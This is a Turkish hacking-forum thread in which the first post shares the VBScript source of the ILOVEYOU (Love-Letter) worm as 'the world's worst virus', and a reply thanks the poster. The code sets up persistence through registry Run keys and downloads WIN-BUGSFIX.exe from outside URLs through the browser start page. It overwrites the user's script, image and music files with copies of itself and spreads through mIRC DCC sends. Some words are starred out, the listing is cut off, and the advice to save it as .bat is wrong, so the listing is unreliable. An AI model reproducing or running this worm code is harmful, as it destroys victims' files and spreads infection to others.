TurkishDarbeTeam Türk Hack And Securitp Platform

Geri git   TurkishDarbeTeam Türk Hack And Securitp Platform >
TurkishDarbeTeam World Hackers
> Trojan ve Virüsler
Anasayfa Forum Kayıt ol Yardım Üye Listesi Ajanda Arama Bugünki Mesajlar Forumları Okundu Kabul Et

Tags:

Cevapla
 
LinkBack Seçenekler Stil
Alt 07-08-2008, 10:11 AM   #1 (permalink)
Member
T.D.TTürk Hacking And Security Platform & TürkisDarbeTeam
 
07MeRT07 - ait Kullanıcı Resmi (Avatar)
Bilgiler
Üyelik tarihi: Jul 2008
Nerden: Antalya

Teşekkür Et =
0 For This Post,
0 Toplam
Mesajlar: 87
Konuları: 13
Karizma
Rep Gücü :
Rep Puanı : 10
Rep Seviyesi : 07MeRT07 is on a distinguished road
Seviye: 8 [♥ Bé-Yêu ♥♥ Bé-Yêu ♥♥ Bé-Yêu ♥♥ Bé-Yêu ♥♥ Bé-Yêu ♥]
Aktiflik: 0 / 182
Güç: 29 / 269
Deneyim: 29%
İletisim
Standart Dünyanın en kötü virüsü

Dünyanın en kötü virüsü



rem delete -pcaş(-vbe)
On es error -pc
On error Next Pc Hack
dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,d ow
eq=""
ctr=0
Set fso = CreateObject("******ing.FileSystemObject")
set file = fso.OpenTextFile(W******.******Fullname,1)
vbscopy=file.ReadAll
main()
sub main()
On Error Resume Next
dim wscr,rr
set wscr=CreateObject("W******.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\Software\Micros oft\Window s ******ing Host\Settings\Timeout")
if (rr>=1) then
wscr.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows ******ing Host\Settings\Timeout",0,"REG_DWORD"
end if
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(W******.******FullName)
c.Copy(dirsystem&"\MSKernel32.vbs")
c.Copy(dirwin&"\Win32DLL.vbs")
c.Copy(dirsystem&"\LOVE-LETTER-FOR-YOU.TXT.vbs")
regruns()
html()
spreadtoemail()
listadriv()
end sub
sub regruns()
On Error Resume Next
Dim num,downread
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows \Cur rentVersio n\Run\MSKernel32",dirsystem&"\MSKernel32.vbs"
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows \Cur rentVersio n\RunServices\Win32DLL",dirwin&"\Win32DLL.vbs"
downread=""
downread=regget("HKEY_CURRENT_USER\Software\Micros oft\Intern et Explorer\Download Directory")
if (downread="") then
downread="c:\"
end if
if (fileexist(dirsystem&"\WinFAT32.exe")=1) then
Randomize
num = Int((4 * Rnd) + 1)
if num = 1 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~young1s/HJKhjnwerhj kxcvytwertnMTFwetrdsfmhPnjw6587345gvsdf 7679njbvYT /WIN-BUGSFIX.exe"
elseif num = 2 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~angelcat/skladjflfd jghKJnwetryDGFikjUIyqwerWe546786324hjk4j nHHGbvbmKL JKjhkqj4w/WIN-BUGSFIX.exe"
elseif num = 3 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRp Gq**198vbFV5hfFEkbopBdQZnmPOhfgER67b3V bvg/WIN-BUGSFIX.exe"
elseif num = 4 then
regcreate "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNB mnfgkKLHjkqwtuHJBhAFSDGjkhYUgqweras djhPhjasfd glkNBhbqwebmznxcbvnmadshfgqw237461234iuy7thjg/WIN-BUGSFIX.exe"
end if
end if
if (fileexist(downread&"\WIN-BUGSFIX.exe")=0) then
regcreate "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows \Cur rentVersio n\Run\WIN-BUGSFIX",downread&"\WIN-BUGSFIX.exe"
regcreate "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","about:blank"
end if
end sub
sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d in dc
If d.DriveType = 2 or d.DriveType=3 Then
folderlist(d.path&"\")
end if
Next
listadriv = s
end sub
sub infectfiles(folderspec)
On Error Resume Next
dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
set f = fso.GetFolder(folderspec)
set fc = f.Files
for each f1 in fc
ext=fso.GetExtensionName(f1.path)
ext=lcase(ext)
s=lcase(f1.name)
if (ext="vbs") or (ext="vbe") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
elseif(ext="js") or (ext="jse") or (ext="css") or (ext="wsh") or (ext="sct") or (ext="hta") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
bname=fso.GetBaseName(f1.path)
set cop=fso.GetFile(f1.path)
cop.copy(folderspec&"\"&bname&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="jpg") or (ext="jpeg") then
set ap=fso.OpenTextFile(f1.path,2,true)
ap.write vbscopy
ap.close
set cop=fso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
elseif(ext="mp3") or (ext="mp2") then
set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
mp3.close
set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
end if
if (eq<>folderspec) then
if (s="mirc32.exe") or (s="mlink32.exe") or (s="mirc.ini") or (s="******.ini") or (s="mirc.hlp") then
set ******ini=fso.CreateTextFile(folderspec&"\******.i ni")
******ini.WriteLine "[******]"
******ini.WriteLine ";mIRC ******"
******ini.WriteLine "; Please dont edit this ******... mIRC will corrupt, if mIRC will"
******ini.WriteLine " corrupt... WINDOWS will affect and will not run correctly. thanks"
******ini.WriteLine ";"
******ini.WriteLine ";Khaled Mardam-Bey"
******ini.WriteLine ";http://www.mirc.com"
******ini.WriteLine ";"
******ini.WriteLine "n0=on 1:JOIN:#:{"
******ini.WriteLine "n1= /if ( şnick == şme ) { halt }"
******ini.WriteLine "n2= /.dcc send şnick "&dirsystem&"\LOVE-LETTER-FOR-YOU.HTM"
******ini.WriteLine "n3=}"
******ini.close
eq=folderspec
end if
end if
next
end sub
sub folderlist(folderspec)
On Error Resume Next
dim f,f1,sf
set f = fso.GetFolder(folderspec)
set sf = f.SubFolders
for each f1 in sf
infectfiles(f1.path)
folderlist(f1.path)
next
end sub
sub regcreate(regkey,regvalue)
Set regedit = CreateObject("W******.Shell")
regedit.RegWrite regkey,regvalue
end sub
function regget(value)
Set regedit = CreateObject("W******.Shell")
regget=regedit.RegRead(value)
end function
function fileexist(filespec)
On Error Resume Next
dim msg
if (fso.FileExists(filespec)) Then
msg = 0
else
msg = 1
end if
fileexist = msg
end function
function folderexist(folderspec)
On Error Resume Next
dim msg
if (fso.GetFolderExists(folderspec)) then
msg = 0



bu kodları not defterine kaydetin uzantısını .bat yapın ama masum kişilerde bunu kullanmayın

emege saygı +rep
07MeRT07 isimli Üye şimdilik offline konumundadır   Alıntı ile Cevapla
Alt 10-28-2008, 12:56 AM   #2 (permalink)
T.D.T Acemi Üye
T.D.TTürk Hacking And Security Platform & TürkisDarbeTeam
 
WAWAS - ait Kullanıcı Resmi (Avatar)
Bilgiler
Üyelik tarihi: Oct 2008

Teşekkür Et =
0 For This Post,
0 Toplam
Mesajlar: 3
Konuları: 0
Karizma
Rep Gücü :
Rep Puanı : 10
Rep Seviyesi : WAWAS is on a distinguished road
Seviye: 1 [♥ Bé-Yêu ♥]
Aktiflik: 0 / 2
Güç: 1 / 1
Deneyim: 10%
İletisim
Standart

Emege Saygi TeŞekkÜrler +rep
WAWAS isimli Üye şimdilik offline konumundadır   Alıntı ile Cevapla
Cevapla


Seçenekler
Stil

Yetkileriniz
Yeni Mesaj yazma yetkiniz aktif değil dir.
Mesajlara Cevap verme yetkiniz aktif değil dir.
Eklenti ekleme yetkiniz aktif değil dir.
Kendi Mesajınızı değiştirme yetkiniz aktif değil dir.

Smileler Açık
[IMG] Kodları Açık
HTML-KodlarıKapalı
Trackbacks are Açık
Pingbacks are Açık
Refbacks are Açık



Şu Anki Saat: 09:34 AM


Powered by vBulletin 3.6.x
Koruma Kalkanı Devrede
Search Engine Friendly URLs by vBSEO 3.1.0 ©2007, Crawlability, Inc.
Skin Developed by RevengeSoldieR
3, 4, 5, 6, 7, 8, 9, 11, 12, 13, 14, 15, 16, 19, 17, 18, 20, 52, 34, 35, 33, 31, 32, 30, 28, 29, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 53, 54, 3, 4, 5, 6, 7, 8, 9, 11, 12, 13, 14, 15, 16, 19, 17, 18, 20, 52, 34, 35, 33, 31, 32, 30, 28, 29, 36, 37, 38, 39, 40, 41, 42, 43, 44, 45, 46, 47, 48, 49, 50, 51, 53, 54,
TOPlist